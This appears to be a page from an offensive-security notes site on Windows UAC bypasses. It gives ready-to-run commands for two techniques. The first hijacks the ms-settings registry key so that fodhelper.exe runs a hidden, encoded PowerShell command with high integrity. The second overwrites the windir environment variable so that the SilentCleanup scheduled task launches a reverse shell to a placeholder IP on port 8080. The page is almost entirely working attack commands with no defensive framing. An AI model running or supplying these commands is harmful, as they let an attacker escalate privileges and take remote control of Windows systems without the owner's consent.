UAC Bypasses

FODhelper

Set registry keys to execute commands with high integrity via fodhelper.exe

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell.exe -nop -w hidden -e <ENCODED COMMAND>"
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

Standard Scheduled Task

Overwrite environment variables to execute commands from standard high-integrity scheduled tasks.

Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value "cmd.exe /K C:\Windows\Tasks\RShell.exe <IP> 8080 & REM " -Force
Start-ScheduledTask -TaskPath "\Microsoft\Windows\DiskCleanup" -TaskName "SilentCleanup"

PreviousShellcode Loader Guidelines NextAppLocker

Last updated 4 months ago